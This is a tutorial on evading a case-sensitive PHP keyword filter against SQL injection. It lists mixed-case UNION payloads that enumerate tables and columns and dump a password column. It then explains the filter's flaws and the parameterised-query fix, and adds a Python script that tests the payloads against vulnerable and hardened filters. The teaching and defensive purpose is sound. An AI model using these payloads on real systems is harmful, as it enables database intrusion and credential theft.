Bypassing SQL Filters

UNION Filters

Let's say we are testing a login form and it returns an error whenever we try to execute UNION SELECT. This suggests that a WAF or an input filter is matching the keyword, so we change its case and send UNion instead.

The payloads below are the usual progression: read back one expression, enumerate tables, enumerate columns, then dump a column. "command" in the first one stands for whatever expression you want echoed back (e.g. version()). The "@test.com" suffix keeps the injected value looking like an email address, so it survives an email check on the way in or out; the "limit N,1" clauses step through results one row at a time.

Email=' UNion select 1,2,3,concat(command, "@test.com") -- -
Email=' UNion select 1,2,3,concat(table_name, "@test.com") FROM information_schema.tables where table_schema="databasename" limit 1,1 -- -
Email=' UNion select 1,2,3,concat(column_name, "@test.com") FROM information_schema.columns where table_name="tablename" limit 2,1 -- -
Email=' UNion select 1,2,3,concat(password, "@test.com") FROM tablename limit 1,1 -- -

You can also use GROUP_CONCAT instead of concat: it joins all rows of the column into one result, so you do not need to step through them with limit.

The PHP filter that produced the error is below:

if (strpos($user, "UNION") ||
    strpos($user, "INFORMATION_SCHEMA") ||
    strpos($user, "union")) {
    echo "Error"; die;
}

Notice that the filter only looks for the exact strings "UNION", "INFORMATION_SCHEMA" and "union", and strpos() is case-sensitive. Any other spelling of the keyword (UNion, uNiOn, and so on) is not matched, and information_schema in lowercase is not matched at all, which is why the payloads above go straight through. There is a second weakness: strpos() returns the offset of the match, and an offset of 0 is false in PHP, so a value that begins with UNION also passes the check; a correct comparison is strpos(...) !== false, or stripos() for a case-insensitive match. Keyword blacklists like this are fragile in general, and the real fix is a parameterised query.
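To test the bypass offline, here is the page's PHP filter re-implemented in Python beside a case-insensitive version, with the page's payloads run through both. This is an added example, not code from the page; the payload strings are the page's own, and the helper names (php_strpos_truthy, vulnerable_filter, hardened_filter, evaluate) are assumed.

```python
# Added example (not the page's code): emulate the page's PHP keyword
# filter and check which payloads it lets through. Payload strings and
# the blocked-word list come from the page; helper names are assumed.

BLOCKED = ("UNION", "INFORMATION_SCHEMA", "union")  # exact list from the PHP filter


def php_strpos_truthy(haystack: str, needle: str) -> bool:
    """Emulate `if (strpos($h, $n))` in PHP.

    strpos() is case-sensitive and returns the 0-based offset or false.
    Offset 0 is falsy in PHP, so a needle at the very start of the string
    is treated as "not found" by the page's filter.
    """
    return haystack.find(needle) > 0


def vulnerable_filter(user: str) -> bool:
    """True when the page's filter would print 'Error' and die."""
    return any(php_strpos_truthy(user, word) for word in BLOCKED)


def hardened_filter(user: str) -> bool:
    """Case-insensitive match that also honours a hit at offset 0
    (PHP equivalent: stripos($user, $word) !== false)."""
    lowered = user.lower()
    return any(word.lower() in lowered for word in BLOCKED)


# Constructed inputs: the first is the uppercase form that triggers the
# error, the second is the page's mixed-case table-enumeration payload,
# the third shows the offset-0 quirk.
PAYLOADS = {
    "plain": "' UNION select 1,2,3,4 -- -",
    "mixed": "' UNion select 1,2,3,concat(table_name, \"@test.com\") FROM "
             "information_schema.tables where table_schema=\"databasename\" limit 1,1 -- -",
    "at_start": "UNION select 1,2,3,4 -- -",
}


def evaluate(payload: str) -> dict:
    """Run one payload through both filters and report which ones it bypasses."""
    return {
        "bypasses_vulnerable": not vulnerable_filter(payload),
        "bypasses_hardened": not hardened_filter(payload),
    }


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:9s} {evaluate(payload)}")
```

Only the uppercase payload is stopped by the page's filter; the mixed-case one and the one starting with UNION both get through, while the case-insensitive check catches all three. Even the hardened version is still a blacklist, so treat it as a detection aid rather than the fix.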
